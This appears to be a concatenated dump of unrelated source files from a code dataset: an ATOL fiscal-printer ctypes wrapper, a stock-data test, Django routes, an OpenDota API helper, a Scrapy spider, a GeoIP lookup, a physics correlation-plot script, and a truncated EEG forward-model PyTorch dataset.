_create = self.CREATE_METHOD(('libfptr_create', self.library))\n _create(ctypes.pointer(self.interface))\n\n self._setByteArray = self.SET_BYTEARRAY_METHOD(\n ('libfptr_set_param_bytearray', self.library))\n self._getByteArray = self.GET_BYTEARRAY_METHOD(\n ('libfptr_get_param_bytearray', self.library))\n self._setInt = self.SET_INT_METHOD(('libfptr_set_param_int', self.library))\n self._getInt = self.GET_INT_METHOD(('libfptr_get_param_int', self.library))\n self._setBool = self.SET_BOOL_METHOD(('libfptr_set_param_bool', self.library))\n self._getBool = self.GET_BOOL_METHOD(('libfptr_get_param_bool', self.library))\n self._setDouble = self.SET_DOUBLE_METHOD(('libfptr_set_param_double', self.library))\n self._getDouble = self.GET_DOUBLE_METHOD(('libfptr_get_param_double', self.library))\n self._setDateTime = self.SET_DATETIME_METHOD(('libfptr_set_param_datetime', self.library))\n self._getDateTime = self.GET_DATETIME_METHOD(('libfptr_get_param_datetime', self.library))\n self._setString = self.SET_STRING_METHOD(('libfptr_set_param_str', self.library))\n self._getString = self.GET_STRING_METHOD(('libfptr_get_param_str', self.library))\n self._setSettings = self.SET_SETTINGS_METHOD(('libfptr_set_settings', self.library))\n self._getSettings = self.GET_SETTINGS_METHOD(('libfptr_get_settings', self.library))\n self._getSingleSetting = self.GET_SINGLE_SETTING_METHOD(\n ('libfptr_get_single_setting', self.library))\n self._setSingleSetting = self.SET_SINGLE_SETTING_METHOD(\n ('libfptr_set_single_setting', self.library))\n self._getVersion = self.GET_VERSION_METHOD(('libfptr_get_version_string', self.library))\n self._isOpened = self.IS_OPENED_METHOD(('libfptr_is_opened', self.library))\n self._errorCode = self.GET_ERROR_CODE_METHOD(('libfptr_error_code', self.library))\n self._errorDescription = self.GET_ERROR_DESCRIPTION_METHOD(('libfptr_error_description', self.library))\n self._logWrite = self.LOG_WRITE_METHOD(('libfptr_log_write', self.library))\n self._showProperties = self.SHOW_PROPERTIES_METHOD(('libfptr_show_properties', self.library))\n\n def __del__(self):\n destroy = self.DESTROY_METHOD(('libfptr_destroy', self.library))\n destroy(ctypes.pointer(self.interface))\n\n def version(self):\n return self._getVersion()\n\n def logWrite(self, tag, level, message):\n return self._logWrite(tag, level, message)\n\n def showProperties(self, parentType, parent):\n return self._showProperties(self.interface, parentType, parent)\n\n def isOpened(self):\n return self._isOpened(self.interface)\n\n def errorCode(self):\n return self._errorCode(self.interface)\n\n def errorDescription(self):\n buff = ctypes.create_unicode_buffer(self.DEFAULT_BUFF_SIZE)\n size = self._errorDescription(self.interface, buff, self.DEFAULT_BUFF_SIZE)\n if size > self.DEFAULT_BUFF_SIZE:\n buff = ctypes.create_unicode_buffer(size)\n self._errorDescription(self.interface, buff, size)\n return buff.value\n\n def setSettings(self, settings):\n return self._setSettings(self.interface, json.dumps(settings))\n\n def getSettings(self):\n buff = ctypes.create_unicode_buffer(self.DEFAULT_BUFF_SIZE)\n size = self._getSettings(self.interface, buff, self.DEFAULT_BUFF_SIZE)\n if size > self.DEFAULT_BUFF_SIZE:\n buff = ctypes.create_unicode_buffer(size)\n self._getSettings(self.interface, buff, size)\n return json.loads(buff.value)\n\n def setSingleSetting(self, key, value):\n self._setSingleSetting(self.interface, key, value)\n\n def getSingleSetting(self, key):\n buff = ctypes.create_unicode_buffer(self.DEFAULT_BUFF_SIZE)\n size = self._getSingleSetting(self.interface, key, buff, self.DEFAULT_BUFF_SIZE)\n if size > self.DEFAULT_BUFF_SIZE:\n buff = ctypes.create_unicode_buffer(size)\n self._getSingleSetting(self.interface, key, buff, size)\n return buff.value\n\n def setParam(self, paramId, param):\n if isinstance(param, int):\n self._setInt(self.interface, ctypes.c_int(paramId), ctypes.c_uint(param))\n elif isinstance(param, bool):\n self._setBool(self.interface, ctypes.c_int(paramId), ctypes.c_int(param))\n elif isinstance(param, float):\n self._setDouble(self.interface, ctypes.c_int(paramId), ctypes.c_double(param))\n elif isinstance(param, list):\n self._setByteArray(self.interface, ctypes.c_int(paramId),\n (ctypes.c_ubyte * len(param))(*param), len(param))\n elif isinstance(param, bytearray):\n self._setByteArray(self.interface, ctypes.c_int(paramId),\n (ctypes.c_ubyte * len(param))(*param), len(param))\n elif isinstance(param, datetime.datetime):\n self._setDateTime(self.interface, ctypes.c_int(paramId), param.date().year,\n param.date().month,\n param.date().day,\n param.time().hour, param.time().minute, param.time().second)\n elif isinstance(param, TEXT):\n self._setString(self.interface, ctypes.c_int(paramId), ctypes.c_wchar_p(param))\n else:\n raise Exception(u'Неподдерживаемый тип параметра')\n\n def getParamInt(self, paramId):\n value = self._getInt(self.interface, ctypes.c_int(paramId))\n return value\n\n def getParamBool(self, paramId):\n value = self._getBool(self.interface, ctypes.c_int(paramId))\n return value != 0\n\n def getParamDouble(self, paramId):\n value = self._getDouble(self.interface, ctypes.c_int(paramId))\n return value\n\n def getParamByteArray(self, paramId):\n value = (ctypes.c_ubyte * self.DEFAULT_BUFF_SIZE)()\n size = self._getByteArray(self.interface, ctypes.c_int(paramId),\n ctypes.cast(value, ctypes.POINTER(ctypes.c_ubyte)),\n self.DEFAULT_BUFF_SIZE)\n if size > self.DEFAULT_BUFF_SIZE:\n answer = (ctypes.c_ubyte * size)()\n size = self._getByteArray(self.interface, ctypes.c_int(paramId),\n ctypes.cast(value, ctypes.POINTER(ctypes.c_ubyte)), size)\n return value[:size]\n\n def getParamDateTime(self, paramId):\n year = ctypes.c_int(0)\n month = ctypes.c_int(0)\n day = ctypes.c_int(0)\n hour = ctypes.c_int(0)\n minute = ctypes.c_int(0)\n second = ctypes.c_int(0)\n self._getDateTime(self.interface, ctypes.c_int(paramId), ctypes.pointer(year),\n ctypes.pointer(month),\n ctypes.pointer(day),\n ctypes.pointer(hour), ctypes.pointer(minute), ctypes.pointer(second))\n return datetime.datetime(year.value, month.value, day.value, hour.value, minute.value,\n second.value)\n\n def getParamString(self, paramId):\n value = ctypes.create_unicode_buffer(self.DEFAULT_BUFF_SIZE)\n size = self._getString(self.interface, ctypes.c_int(paramId), value, self.DEFAULT_BUFF_SIZE)\n if size > self.DEFAULT_BUFF_SIZE:\n value = ctypes.create_unicode_buffer(size)\n self._getString(self.interface, ctypes.c_int(paramId), value, size)\n return value.value\n\n def applySingleSettings(self):\n _method = self.METHOD(('libfptr_apply_single_settings', self.library))\n return _method(self.interface)\n\n def open(self):\n _method = self.METHOD(('libfptr_open', self.library))\n return _method(self.interface)\n\n def close(self):\n _method = self.METHOD(('libfptr_close', self.library))\n return _method(self.interface)\n\n def resetParams(self):\n _method = self.METHOD(('libfptr_reset_params', self.library))\n return _method(self.interface)\n\n def runCommand(self):\n _method = self.METHOD(('libfptr_run_command', self.library))\n return _method(self.interface)\n\n def beep(self):\n _method = self.METHOD(('libfptr_beep', self.library))\n return _method(self.interface)\n\n def openDrawer(self):\n _method = self.METHOD(('libfptr_open_drawer', self.library))\n return _method(self.interface)\n\n def cut(self):\n _method = self.METHOD(('libfptr_cut', self.library))\n return _method(self.interface)\n\n def devicePoweroff(self):\n _method = self.METHOD(('libfptr_device_poweroff', self.library))\n return _method(self.interface)\n\n def deviceReboot(self):\n _method = self.METHOD(('libfptr_device_reboot', self.library))\n return _method(self.interface)\n\n def openShift(self):\n _method = self.METHOD(('libfptr_open_shift', self.library))\n return _method(self.interface)\n\n def resetSummary(self):\n _method = self.METHOD(('libfptr_reset_summary', self.library))\n return _method(self.interface)\n\n def initDevice(self):\n _method = self.METHOD(('libfptr_init_device', self.library))\n return _method(self.interface)\n\n def queryData(self):\n _method = self.METHOD(('libfptr_query_data', self.library))\n return _method(self.interface)\n\n def cashIncome(self):\n _method = self.METHOD(('libfptr_cash_income', self.library))\n return _method(self.interface)\n\n def cashOutcome(self):\n _method = self.METHOD(('libfptr_cash_outcome', self.library))\n return _method(self.interface)\n\n def openReceipt(self):\n _method = self.METHOD(('libfptr_open_receipt', self.library))\n return _method(self.interface)\n\n def cancelReceipt(self):\n _method = self.METHOD(('libfptr_cancel_receipt', self.library))\n return _method(self.interface)\n\n def closeReceipt(self):\n _method = self.METHOD(('libfptr_close_receipt', self.library))\n return _method(self.interface)\n\n def checkDocumentClosed(self):\n _method = self.METHOD(('libfptr_check_document_closed', self.library))\n return _method(self.interface)\n\n def receiptTotal(self):\n _method = self.METHOD(('libfptr_receipt_total', self.library))\n return _method(self.interface)\n\n def receiptTax(self):\n _method = self.METHOD(('libfptr_receipt_tax', self.library))\n return _method(self.interface)\n\n def registration(self):\n _method = self.METHOD(('libfptr_registration', self.library))\n return _method(self.interface)\n\n def payment(self):\n _method = self.METHOD(('libfptr_payment', self.library))\n return _method(self.interface)\n\n def report(self):\n _method = self.METHOD(('libfptr_report', self.library))\n return _method(self.interface)\n\n def printText(self):\n _method = self.METHOD(('libfptr_print_text', self.library))\n return _method(self.interface)\n\n def printCliche(self):\n _method = self.METHOD(('libfptr_print_cliche', self.library))\n return _method(self.interface)\n\n def beginNonfiscalDocument(self):\n _method = self.METHOD(('libfptr_begin_nonfiscal_document', self.library))\n return _method(self.interface)\n\n def endNonfiscalDocument(self):\n _method = self.METHOD(('libfptr_end_nonfiscal_document', self.library))\n return _method(self.interface)\n\n def printBarcode(self):\n _method = self.METHOD(('libfptr_print_barcode', self.library))\n return _method(self.interface)\n\n def printPicture(self):\n _method = self.METHOD(('libfptr_print_picture', self.library))\n return _method(self.interface)\n\n def printPictureByNumber(self):\n _method = self.METHOD(('libfptr_print_picture_by_number', self.library))\n return _method(self.interface)\n\n def uploadPictureFromFile(self):\n _method = self.METHOD(('libfptr_upload_picture_from_file', self.library))\n return _method(self.interface)\n\n def clearPictures(self):\n _method = self.METHOD(('libfptr_clear_pictures', self.library))\n return _method(self.interface)\n\n def writeDeviceSettingRaw(self):\n _method = self.METHOD(('libfptr_write_device_setting_raw', self.library))\n return _method(self.interface)\n\n def readDeviceSettingRaw(self):\n _method = self.METHOD(('libfptr_read_device_setting_raw', self.library))\n return _method(self.interface)\n\n def commitSettings(self):\n _method = self.METHOD(('libfptr_commit_settings', self.library))\n return _method(self.interface)\n\n def initSettings(self):\n _method = self.METHOD(('libfptr_init_settings', self.library))\n return _method(self.interface)\n\n def resetSettings(self):\n _method = self.METHOD(('libfptr_reset_settings', self.library))\n return _method(self.interface)\n\n def writeDateTime(self):\n _method = self.METHOD(('libfptr_write_date_time', self.library))\n return _method(self.interface)\n\n def writeLicense(self):\n _method = self.METHOD(('libfptr_write_license', self.library))\n return _method(self.interface)\n\n def fnOperation(self):\n _method = self.METHOD(('libfptr_fn_operation', self.library))\n return _method(self.interface)\n\n def fnQueryData(self):\n _method = self.METHOD(('libfptr_fn_query_data', self.library))\n return _method(self.interface)\n\n def fnWriteAttributes(self):\n _method = self.METHOD(('libfptr_fn_write_attributes', self.library))\n return _method(self.interface)\n\n def externalDevicePowerOn(self):\n _method = self.METHOD(('libfptr_external_device_power_on', self.library))\n return _method(self.interface)\n\n def externalDevicePowerOff(self):\n _method = self.METHOD(('libfptr_external_device_power_off', self.library))\n return _method(self.interface)\n\n def externalDeviceWriteData(self):\n _method = self.METHOD(('libfptr_external_device_write_data', self.library))\n return _method(self.interface)\n\n def externalDeviceReadData(self):\n _method = self.METHOD(('libfptr_external_device_read_data', self.library))\n return _method(self.interface)\n\n def operatorLogin(self):\n _method = self.METHOD(('libfptr_operator_login', self.library))\n return _method(self.interface)\n\n def processJson(self):\n _method = self.METHOD(('libfptr_process_json', self.library))\n return _method(self.interface)\n\n def readDeviceSetting(self):\n _method = self.METHOD(('libfptr_read_device_setting', self.library))\n return _method(self.interface)\n\n def writeDeviceSetting(self):\n _method = self.METHOD(('libfptr_write_device_setting', self.library))\n return _method(self.interface)\n\n def beginReadRecords(self):\n _method = self.METHOD(('libfptr_begin_read_records', self.library))\n return _method(self.interface)\n\n def readNextRecord(self):\n _method = self.METHOD(('libfptr_read_next_record', self.library))\n return _method(self.interface)\n\n def endReadRecords(self):\n _method = self.METHOD(('libfptr_end_read_records', self.library))\n return _method(self.interface)\n\n def userMemoryOperation(self):\n _method = self.METHOD(('libfptr_user_memory_operation', self.library))\n return _method(self.interface)\n\n def continuePrint(self):\n _method = self.METHOD(('libfptr_continue_print', self.library))\n return _method(self.interface)\n\n def initMgm(self):\n _method = self.METHOD(('libfptr_init_mgm', self.library))\n return _method(self.interface)\n\n def utilFormTlv(self):\n _method = self.METHOD(('libfptr_util_form_tlv', self.library))\n return _method(self.interface)\n\n def utilFormNomenclature(self):\n _method = self.METHOD(('libfptr_util_form_nomenclature', self.library))\n return _method(self.interface)\n\n def utilMapping(self):\n _method = self.METHOD(('libfptr_util_mapping', self.library))\n return _method(self.interface)\n\n def readModelFlags(self):\n _method = self.METHOD(('libfptr_read_model_flags', self.library))\n return _method(self.interface)\n\n\n","sub_path":"atol/libfptr10.py","file_name":"libfptr10.py","file_ext":"py","file_size_in_byte":48832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"223324345","text":"import unittest\nfrom ..datafeed import *\nfrom datetime import datetime\n\nclass TestDataFeed(unittest.TestCase):\n\n def __test_fetch_data(self):\n start_date = datetime(2010,1,1)\n end_date = datetime(2011,1,1)\n url = 'http://ailabx.com/kensho/quotes?code={}&start={}&end={}'.format(\n '600838,600519,000002',\n start_date.strftime('%Y%m%d'),\n end_date.strftime('%Y%m%d')\n )\n df = D.fetch_data(url)\n print(df.head())\n\n #加载maindata基本面数据\n url = 'http://www.ailabx.com/kensho/maindata?code={}&start={}&end={}'.format(\n '600519',\n start_date.strftime('%Y%m%d'),\n end_date.strftime('%Y%m%d')\n )\n df = D.fetch_data(url)\n print(df)\n\n def __test_load_benchmark(self):\n start_date = datetime(2010, 12, 29)\n end_date = datetime(2016, 1, 1)\n df = D.load_benchmark('000300', start_date, end_date)\n print(df.head())\n\n def test_load_datas(self):\n start_date = datetime(2016, 7, 15)\n end_date = datetime(2016, 9, 1)\n features = ['open_0/close_0','cross(pe_0,pe_1)','rank(return_1/return_0)','rank(pe_0)']\n df = D.load_datas(['600519','600838','000002','000008'],start_date,end_date,features=features)\n print(df.head())\n\n print(D.get_bars_by_date('2016-08-24',code='600519'))\n print(D.get_bars_by_code('600519'))\n\n\n\n def __test_instruments(self):\n start = datetime(2010, 1, 1)\n end = datetime(2017, 7, 19)\n instruments = D.instruments(start,end)\n print(len(instruments),instruments[:10])\n\n\n def __test_fundamentals(self):\n start = datetime(2016, 1, 1)\n end = datetime(2017, 1, 1)\n\n df = D.fundamentals('600519',start,end)\n print(df)\n\n def __test_fundamentals_quotes(self):\n start = datetime(2016, 1, 1)\n end = datetime(2017, 1, 1)\n\n df = D.fundamentals('600519', start, end)\n #print(df)\n\n df_quotes = D._load_data('600519',start,end)\n print(df_quotes)\n","sub_path":"quant/engine/test/test_datafeed.py","file_name":"test_datafeed.py","file_ext":"py","file_size_in_byte":2079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"580437370","text":"\"\"\"embers URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.urls import path, re_path\nfrom django.conf.urls import url\n\nfrom . import views\n\napp_name = 'sim_trade'\n\nurlpatterns = [\n # path('sim_trade/', views.sim_trade, name='sim_trade'),\n path('sim_trade/', views.table, name='sim_trade'),\n re_path(r'sim_trade/getOwned/', views.getOwned, name='getOwned'),\n re_path(r'sim_trade/checkStock/(.+)/$', views.checkStock, name='checkStock'),\n re_path(r'sim_trade/sellCheckStock/(.+)/$', views.sellCheckStock, name='sellCheckStock'),\n url(r'^buy_stock$', views.buy_stock),\n url(r'^sell_stock$', views.sell_stock),\n]\n","sub_path":"embers/sim_trade/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"401316583","text":"import requests\n\nkey = \"3b8b4962-1674-449e-8a5e-b6a500f7b6bb\"\n\n\ndef get_match_details(match_id):\n \"\"\"\n :param match_id: int\n :return: dict\n Returns the request result of a particular match details\n \"\"\"\n url = 'https://api.opendota.com/api/matches/{}'.format(match_id)\n\n result = requests.get(url).json()\n\n return result\n\n\ndef get_hero_vs_hero_stats(heroA_id, heroB_id):\n \"\"\"\n :param heroA_id: int\n :param heroB_id: int\n :return: list\n Return the request result of stats of matches played between two heroes\n \"\"\"\n url = \"https://api.opendota.com/api/findMatches?teamA={}&teamB={}\".format(heroA_id, heroB_id)\n json_data = requests.get(url).json()\n\n matches_played = len(json_data)\n won = sum([i['teamawin'] for i in json_data])\n\n return [matches_played, won]\n","sub_path":"additional_modules/open_dota_api.py","file_name":"open_dota_api.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"198825745","text":"# -*- coding: utf-8 -*-\nimport scrapy\n\n\nclass GlassDataSpider(scrapy.Spider):\n name = 'glass_data'\n allowed_domains = ['www.glassesshop.com']\n start_urls = ['https://www.glassesshop.com/bestsellers']\n\n def parse(self, response):\n \tfor product in response.xpath(\"//div[@class='col-sm-6 col-md-4 m-p-product']\"):\n \t\tyield {\n \t\t'product_url' : product.xpath(\".//p[@class='pname col-sm-12']/a/@href\").get(),\n \t\t'image_url' : product.xpath(\".//div[@class='pimg default-image-front']/a/img[@class='angle-image']/@src\").get(),\n \t\t'product_name' : product.xpath(\".//p[@class='pname col-sm-12']/a/text()\").get(),\n \t\t'product_price' : product.xpath(\".//div[@class='row']/div[contains(@class,'pprice')]/span/text()\").get() \t\t}\n\n \tnext_page = response.xpath(\"//ul[@class='pagination']/li[7]/a/@href\").get()\n\n \tif next_page:\n \t\tyield scrapy.Request (url=next_page , callback=self.parse) \n","sub_path":"glassshop/glassshop/spiders/glass_data.py","file_name":"glass_data.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"530925571","text":"import geoip2.database\nfrom ordereddict import OrderedDict\nfrom geoip2.errors import AddressNotFoundError\n\nfrom ipify.config import GEOIP_DATAFILE\n\n\ngi = geoip2.database.Reader(GEOIP_DATAFILE)\n\ndef lookup(ip):\n info = gi.city(ip)\n lang = 'en'\n return OrderedDict([\n ('ip', info.traits.ip_address),\n ('city', info.city.names.get(lang)),\n ('country', info.country.names.get(lang)),\n ('location', [\n info.location.latitude,\n info.location.longitude\n ]),\n ])\n","sub_path":"ipify/libs/geoip.py","file_name":"geoip.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"515418531","text":"import numpy as np\n#from scipy.integrate import quad\nfrom matplotlib import pyplot as plt\nimport os,inspect\nimport matplotlib.ticker as ticker\n\ndef parameters_kin(var,par):\n\ttopmassup=800\n\ttopmassdown=0\n\tbmassup=60\n\tbmassdown=0\n\tumassup=1\n\tumassdown=0\n\twmassup=300\n\twmassdown=0\n\tjmassup=60\n\tjmassdown=0\n\n\tdefault_range_up=800\n\tdefault_range_down=0\n\n\tdefault_nbins = 64\n\tmass_nbins = 64\n\tnbin = default_nbins\n\tlower_range=default_range_down\n\tupper_range=default_range_up\n\tup_l = 0.1\n\t#plt.style.use(\"atlas.mplstyle\")\n\tif(par == \"Photon\" and var==\"PT\"):\n\t\tupper_range=default_range_up\n\t\tlower_range=default_range_down\n\t\tnbin=default_nbins\n\tif(par == \"TopQuark\" and var==\"PT\"):\n\t\tupper_range=default_range_up\n\t\tlower_range=default_range_down\n\t\tnbin=64\n\tif (var == \"Eta\" or var == \"Phi\"):\n\t\tlower_range=-5\n\t\tupper_range=5\n\t\tnbin = 32\n\t\tup_l = 0\n\tif (var == \"Eta\" and (par==\"Photon\" or par==\"bJet\" or par==\"Jet\")):\n\t\tlower_range=-2.5\n\t\tupper_range=2.5\n\t\tnbin = 32\n\t\tup_l = 0\n\tif(var==\"M\"):\n\t\tup_l=0\n\t\tnbin=mass_nbins\n\t\tif(\"W\" in par):\n\t\t\tlower_range=wmassdown\n\t\t\tupper_range=wmassup\n\t\tif(\"Top\" in par):\n\t\t\tlower_range=topmassdown\n\t\t\tupper_range=topmassup\n\t\tif(\"Jet\" in par):\n\t\t\t\tlower_range=jmassdown\n\t\t\t\tupper_range=jmassup\n\t\tif(\"bJet\" in par):\n\t\t\tlower_range=bmassdown\n\t\t\tupper_range=bmassup\n\t\tif(\"UQuark\" in par):\n\t\t\tlower_range=umassdown\n\t\t\tupper_range=umassup\n\tif(var==\"PT\"):\n\t\tif(\"bJet\" in par):\n\t\t\tupper_range=400\n\treturn [lower_range,upper_range,nbin,up_l]\n\n\nsam = [\"dec\",\"int\",\"pro\"]\nvar = [\"PT\",\"Eta\",\"Phi\",\"M\"]\npar = [\"Photon\",\"Jet\",\"bJet\",\"WBoson\",\"TopQuark\"]\n\nPREFIX = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))+\"/\"\n\ndatas = os.listdir(PREFIX+\"data\")\n\n\nif(\"corr\" not in os.listdir(PREFIX+\"plots/\")):\n\tos.chdir(PREFIX+\"plots/\")\n\tos.mkdir(\"corr\")\n\tos.chdir(PREFIX)\n\nratiox= 15\nratioy= 15\n\nbfmpd = np.array([])\nbfmi = np.array([])\nnames = []\n\ni=0;j=0;\nfor pa1 in par:\n\tfor va1 in var:\n\t\tif(pa1 == \"Photon\" and va1 == \"M\"):\n\t\t\tcontinue\n\n\t\tevp = np.genfromtxt(\"data/pro_\"+pa1+\"_\"+va1+\".txt\");evd = np.genfromtxt(\"data/dec_\"+pa1+\"_\"+va1+\".txt\");evi = np.genfromtxt(\"data/int_\"+pa1+\"_\"+va1+\".txt\")\n\t\tevp = evp[(np.abs(evp)>0) & (evp!=999.9)];evd = evd[(np.abs(evd)>0) & (evd!=999.9)];evi = evi[(np.abs(evi)>0) & (evi!=999.9)]\n\t\tevpd = np.concatenate((evp, evd), axis=0)\n\n\t\tif bfmpd.size == 0:\n\t\t\tbfmpd = np.concatenate((bfmpd,evpd))\n\t\telse:\n\t\t\tbfmpd = np.vstack((bfmpd,evpd))\n\n\t\tif bfmi.size == 0:\n\t\t\tbfmi = np.concatenate((bfmi,evi))\n\t\telse:\n\t\t\tbfmi = np.vstack((bfmi,evi))\n\n\t\tn = pa1+va1\n\t\tnames.append(n)\t\n\t\ti+=1\t\t\t\n\t\t\t\n\t\t\n\nfig = plt.figure(num=None, figsize=(ratiox,ratioy), dpi=80, facecolor='w', edgecolor='k')\n\ncorrpd = np.corrcoef(bfmpd)\n\nplt.imshow(corrpd)\nplt.colorbar()\nplt.xticks(np.arange(i),names, rotation=45)\nplt.yticks(np.arange(i),names, rotation=45)\n\nimport itertools\nthresh = corrpd.max() / 2.\n\nfor i, j in itertools.product(range(corrpd.shape[0]), range(corrpd.shape[1])):\n\tplt.text(j, i,format(corrpd[i, j], '.2f'),fontsize=13,\n\thorizontalalignment=\"center\",\n\tcolor=\"white\" if corrpd[i, j] > thresh else \"black\")\nplt.title(\"Correlation Matrix Production + Decay\")\nplt.savefig(\"plots/CorrMatrixpd.pdf\",bbox_inches='tight')\n\nplt.close()\nfig.clear()\n\nplt.figure(num=None, figsize=(ratiox,ratioy), dpi=80, facecolor='w', edgecolor='k')\n\ncorri = np.corrcoef(bfmi)\n\nplt.imshow(corri)\nplt.colorbar()\nplt.xticks(np.arange(i),names, rotation=45)\nplt.yticks(np.arange(i),names, rotation=45)\n\nthresh = corri.max() / 2.\n\nfor i, j in itertools.product(range(corri.shape[0]), range(corri.shape[1])):\n\tplt.text(j, i,format(corri[i, j], '.2f'),fontsize=13,\n\thorizontalalignment=\"center\",\n\tcolor=\"white\" if corri[i, j] > thresh else \"black\")\nplt.title(\"Correlation Matrix Interfernce\")\nplt.savefig(\"plots/CorrMatrixi.pdf\",bbox_inches='tight')\n\n\n\n\n\n\n","sub_path":"delphcorrM.py","file_name":"delphcorrM.py","file_ext":"py","file_size_in_byte":3786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"324417767","text":"import time\nimport numpy as np\nimport mne\nimport torch\nfrom torch.utils import data\nfrom mne.datasets import sample\nimport random\nimport multiprocessing as mp\nfrom itertools import product\nimport os\n\n\n# num_cpu = '9' # Set as a string\n# os.environ['OMP_NUM_THREADS'] = num_cpu\nclass ForwardModelDataset(data.Dataset):\n def __init__(self, num_examples, num_channels=44, batch_size=64, length=1000, save_x_t=False):\n self.batch_size = batch_size\n self.length = length\n self.num_channels = num_channels\n self.num_examples = num_examples\n self.num_examples_required = np.math.ceil(num_examples / self.num_channels)\n self.preloaded_examples_source = []\n self.preloaded_examples_eegs = []\n self.save_x_t = save_x_t\n self.load_forward_model()\n self.load_examples()\n if save_x_t:\n assert (len(self.preloaded_examples_source) == len(self.preloaded_examples_eegs))\n\n def __len__(self):\n return int(len(self.preloaded_examples_eegs) / self.batch_size)\n\n def __getitem__(self, index):\n # print(\"please use either .getEEGs or .getSources\")\n # return None\n start = self.batch_size * index\n end = start + self.batch_size\n assert (end <= len(self.preloaded_examples_eegs))\n EEG = self.preloaded_examples_eegs[start: end]\n sample = torch.from_numpy(np.asarray(EEG)).type('torch.FloatTensor')\n sample = sample.view(-1, self.length, 1)\n return sample\n\n def getEEGs(self, index):\n start = self.batch_size * index\n end = start + self.batch_size\n assert (end <= len(self.preloaded_examples_eegs))\n EEG = self.preloaded_examples_eegs[start: end]\n sample = torch.from_numpy(np.asarray(EEG)).type('torch.FloatTensor')\n sample = sample.view(-1, self.length, 1)\n return sample\n\n def getSources(self, index):\n assert (self.save_x_t), \"save_x_t is False. Sources Not Saved\"\n start = self.batch_size * index\n end = start + self.batch_size\n assert (end <= len(self.preloaded_examples_source))\n source = self.preloaded_examples_source[start: end]\n sample = torch.from_numpy(np.asarray(source)).type('torch.FloatTensor')\n return sample\n\n def load_forward_model(self):\n data_path = sample.data_path()\n raw_fname = data_path + '/MEG/sample/sample_audvis_raw.fif'\n self.info = mne.io.read_info(raw_fname)\n # fwd = mne.read_forward_solution(\"../forward_model/sample_forward_model\")\n # fwd = mne.read_forward_solution(\"../../../../../forward_model/sample_forward_model\") # when run.py path relative?\n fwd = mne.read_forward_solution(\"/mnt/home2/dlongo/eegML/forward_model/sample_forward_model\")\n self.fwd_fixed = mne.convert_forward_solution(fwd, surf_ori=True, force_fixed=True,\n use_cps=True)\n leadfield = self.fwd_fixed['sol']['data']\n self.n_dipoles = leadfield.shape[1]\n self.vertices = [src_hemi['vertno'] for src_hemi in self.fwd_fixed['src']]\n\n def load_examples(self):\n if self.save_x_t:\n for i in range(self.num_examples_required):\n self.preloaded_examples_source += [np.random.randn(self.n_dipoles, self.length) * 1e-9]\n self.preloaded_examples_eegs += self.generate_eeg(i)\n self.preloaded_examples_source[:self.num_examples]\n else:\n for i in range(self.num_examples_required):\n self.preloaded_examples_eegs += self.generate_source_then_eeg()\n self.preloaded_examples_eegs = self.preloaded_examples_eegs[:self.num_examples]\n # print(\"pre\", len(self.preloaded_examples_eegs), np.asarray(self.preloaded_examples_eegs).shape)\n # processes =[mp.Process(target=self.generate_eeg, args=(i,)) for i in range(self.num_examples)]\n # for p in processes: p.start()\n # for p in processes: p.join()\n # pool = mp.Pool(mp.cpu_count() - 4) # minus to be safe\n # with mp.Pool(processes=mp.cpu_count() - 4) as pool:\n # results = pool.starmap(self.generate_eeg, product(list(range(self.num_examples))))\n # print(results)\n # self.preloaded_examples_source = [(np.random.randn(self.n_dipoles, self.length) * 1e-9) for i in range(self.num_examples)]\n # self.preloaded_examples_source = [x.get() for x in self.preloaded_examples_source]\n # pool.close()\n # pool.join()\n # jobs = []\n # for i in range(self.num_examples):\n # p = mp.Process(target=self.generate_eeg, args=(i,), name='daemon')\n # p.daemon = True\n # jobs.append(p)\n # p.start()\n # time.sleep(1)\n # p.join()\n # # with mp.Pool(mp.cpu_count() - 4) as pool:\n # self.preloaded_examples_eegs = pool.map_async(self.generate_eeg, list(range(self.num_channels)))\n # self.preloaded_examples_eegs = [pool.(self.generate_eeg(i)) for i in range(self.num_examples)]\n # self.preloaded_examples_eegs = self.preloaded_examples_eegs.get() # [x.get() for x in self.preloaded_examples_eegs]\n # pool.close()\n # pool.join()\n # print(\"type eegs\", len(self.preloaded_examples_eegs)) \n\n # def generate_eeg(self, source_index):\n # stc = mne.SourceEstimate(self.preloaded_examples_source[source_index], self.vertices, tmin=0., tstep=1 / 250)\n # leadfield = mne.apply_forward(self.fwd_fixed, stc, self.info).data / 1e-9\n # self.preloaded_examples_eegs = [leadfield[:self.num_channels]]\n # print(\"finished\", source_index, type(self.preloaded_examples_eegs[-1]))\n\n def generate_eeg(self, source_index):\n stc = mne.SourceEstimate(self.preloaded_examples_source[source_index], self.vertices, tmin=0., tstep=1 / 250)\n leadfield = mne.apply_forward(self.fwd_fixed, stc, self.info).data / 1e-9\n return list(leadfield[:self.num_channels])\n\n def generate_source_then_eeg(self):\n source = np.random.randn(self.n_dipoles, self.length) * 1e-9\n stc = mne.SourceEstimate(source, self.vertices, tmin=0., tstep=1 / 250)\n leadfield = mne.apply_forward(self.fwd_fixed, stc, self.info).data / 1e-9\n return list(leadfield[:self.num_channels])\n\n def shuffle(self):\n if self.save_x_t:\n combined = 